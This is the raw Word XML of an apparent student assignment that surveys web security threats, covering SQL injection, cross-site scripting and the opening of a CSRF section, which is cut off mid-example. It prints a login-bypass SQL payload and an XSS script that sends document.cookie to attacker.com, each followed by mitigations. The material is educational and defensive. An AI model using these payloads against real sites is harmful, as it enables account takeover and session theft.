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2B7" w:rsidRDefault="00386218">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Name: Maureen </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Kaptuiya</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00386218" w:rsidRDefault="00386218">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Reg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> No: </w:t>
      </w:r>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>C024/401431/2023</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00386218" w:rsidRDefault="00386218">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00386218" w:rsidRPr="00386218" w:rsidRDefault="00386218" w:rsidP="00386218">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Research on Web Security Threats: A Contemporary Overview</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The digital landscape of web programming has evolved into a complex ecosystem, where applications manage substantial quantities of private user information and underpin crucial business processes. This document explores several of the most significant security risks prevalent in modern web programming, offering detailed explanations, illustrative real-world examples, and recommended mitigation techniques.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u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>a) SQL Injection (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>): Exploiting Database Vulnerabilities</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SQL Injection represents a code injection method that capitalizes on weaknesses present within a web application's database interaction layer. This vulnerability arises when user-provided input undergoes insufficient sanitization or validation prior to its incorporation into a SQL query. By injecting malicious SQL code into input fields, attackers can manipulate the query's intended logic, thereby gaining unauthorized access to the underlying database.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Mechanism of Action:</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Consider a basic login interface featuring fields for a username and a password. The web application might employ the subsequent SQL query to verify user credentials:</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SQL</w:t>
      </w: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SELECT * FROM users WHERE username = '$username' AND password = '$password';</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If the application directly inserts user-supplied data into this query without adequate sanitization procedures, a malicious actor could input the following string into the username field:</w:t>
      </w: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 OR '1'='1</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This would result in the following modified SQL query:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00386218" w:rsidRPr="00386218" w:rsidRDefault="00386218" w:rsidP="00386218">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w: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SELECT * FROM users WHERE username = '' OR '1'='1' AND password = '$password';</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Given that the condition </w:t>
      </w:r>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'1'='1'</w:t>
      </w:r>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> is perpetually true, this altered query would return all entries from the users table, effectively bypassing the intended authentication process.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00386218" w:rsidRPr="00386218" w:rsidRDefault="00386218" w:rsidP="00386218">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00386218" w:rsidRDefault="00386218" w:rsidP="00386218">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Varieties of SQL Injection:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00386218" w:rsidRPr="00386218" w:rsidRDefault="00386218" w:rsidP="00386218">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">In-band </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: Here, the attacker utilizes the same communication pathway to both introduce the malicious SQL code and retrieve the resulting data. Common subtypes include Error-based </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and Union-based </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">.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Out-of-band </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: In this scenario, the attacker employs a separate communication channel to obtain the outcomes of the injected SQL code, potentially leveraging DNS requests or email communications.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rPr>
      </w:pPr>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Illustrative Case: The Panama Papers Incident</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While not a direct instance of an </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> attack targeting a web application, the 2016 Panama Papers leak vividly illustrates the severe repercussions of database vulnerabilities. A substantial collection of confidential documents originating from the Panamanian law firm </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Mossack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Fonseca was exposed. Although the initial unauthorized access likely stemmed from alternative methods (possibly compromised email accounts or other exploits), the sheer volume of data and its storage methodology rendered it highly susceptible. Had the database housing this information been vulnerable to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, the consequences of the breach could have been even more devastating. The incident unveiled the offshore financial dealings of numerous individuals and entities, triggering investigations and significant damage to reputations.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Strategies for Mitigation:</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Prepared Statements (Parameterized Queries): This stands as the most robust defense mechanism against SQL injection. Prepared statements establish a clear separation between the SQL code structure and the user-provided data. The database server initially compiles the SQL code, and subsequently, the parameters are bound to this pre-compiled statement. This ensures that user-supplied data is treated purely as data values, not as executable code segments.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Input Validation: Implement thorough sanitization and validation of all user-supplied input before its incorporation into any SQL query. This includes verifying the data type, format, and length of the input, as well as escaping any special characters that could potentially be exploited to manipulate the query's logic.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Principle of Least Privilege: Grant database users only the absolute minimum level of permissions necessary for their intended functions. This practice limits the potential damage an attacker can inflict if they successfully exploit an SQL injection vulnerability. For instance, database users involved in routine operations should not possess administrative-level privileges.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00386218" w:rsidRPr="00386218" w:rsidRDefault="00386218" w:rsidP="00386218">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00386218" w:rsidRDefault="00386218" w:rsidP="00386218">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">b) Cross-Site Scripting (XSS): Injecting Malicious Scripts  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00386218" w:rsidRPr="00386218" w:rsidRDefault="00386218" w:rsidP="00386218">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Cross-Site Scripting (XSS) represents a category of injection attacks wherein malicious scripts are introduced into web pages that are subsequently viewed by other users. XSS vulnerabilities </w:t>
      </w:r>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">arise when a web application incorporates user-supplied data into its output destined for a web browser without proper validation or escaping procedures.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Operational Mechanism:</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Consider a website featuring a user comment section. If this website permits users to post arbitrary HTML code without implementing adequate sanitization, an attacker could submit a comment containing the following script:</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HTML</w:t>
      </w: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&lt;script&gt;</w:t>
      </w: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 xml:space="preserve">  // This script aims to steal the user's session cookie and transmit it to the attacker's server</w:t>
      </w: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 xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> cookie = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>;</w:t>
      </w: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 xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>window.location</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.href</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> = "https://attacker.com/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>steal.php?cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=" + cookie;</w:t>
      </w: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&lt;/script&gt;</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When another user views this compromised comment, their web browser will automatically execute the embedded script. This script will then extract the user's session cookie and transmit it to the attacker's designated server. Subsequently, the attacker can utilize this stolen cookie to impersonate the user and gain unauthorized access to their account.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Types of XSS Attacks:</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Reflected XSS: In this type, the malicious script is embedded within a URL or submitted as part of a form submission. The server then reflects this script back to the user's browser within the response, leading to its execution.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DOM-based XSS: Here, the vulnerability resides within the client-side JavaScript code itself. The attacker manipulates the Document Object Model (DOM) of the web page to inject and execute the malicious script directly within the user's browser.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Stored XSS: The malicious script is permanently stored on the target server (e.g., in a database, message forum, or comment section). When other users request and view the affected content, the stored script is served and executed by their browsers.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rPr>
      </w:pPr>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Illustrative Case: The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>MySpace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Worm Incident</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In 2005, a stored XSS worm known as "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Samy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">" achieved rapid propagation across the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>MySpace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> social networking platform. When a user viewed the profile of an infected individual, the worm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>automatically appended "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Samy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> is my hero" to the viewer's profile and added </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Samy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Kamkar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (the worm's creator) as a friend. This worm exhibited an exceptionally rapid rate of spread, compromising over one million </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>MySpace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> profiles within a matter of hours. This incident underscored the potential for XSS attacks to disseminate swiftly and cause widespread disruption.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Strategies for Mitigation:</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Input Validation and Sanitization: Implement rigorous sanitization and validation of all user-supplied input on both the client-side and the server-side. This involves the removal or encoding of any HTML or JavaScript code that could be exploited for malicious purposes. Server-side validation is paramount, as client-side validation can be circumvented by attackers.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Output Encoding: Encode all output that is displayed to the user within the browser. This ensures that any potentially malicious HTML or JavaScript code is rendered as plain text rather than being executed. For example, the &lt; character should be encoded as &amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>lt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>;,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> the &gt; character as &amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>gt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">;, and so forth. Employ context-appropriate encoding techniques, such as HTML encoding for HTML output, URL encoding for URLs, and JavaScript encoding for JavaScript output.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HTTP Only Cookies: Set the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>HttpOnly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag on session cookies. This directive instructs web browsers to prevent client-side scripts from accessing the cookie, thereby mitigating the potential impact of an XSS attack that aims to steal session identifiers.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Regular Security Audits: Conduct routine security assessments of your web application to proactively identify and address any potential XSS vulnerabilities that may exist.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u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">c) Cross-Site Request Forgery (CSRF): Forcing Unintended Actions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Cross-Site Request Forgery (CSRF) constitutes an attack that coerces an authenticated user to perform unwanted actions on a web application in which they are currently logged in. CSRF attacks exploit the inherent trust that a web application places in an authenticated user's web browser.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Operational Mechanism:</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Consider a banking website that facilitates fund transfers via a simple HTTP GET request structured as follows:</w:t>
      </w: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GET /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>transfer.php?to</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>recipient&amp;amount</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00386218">
        <w:rPr>
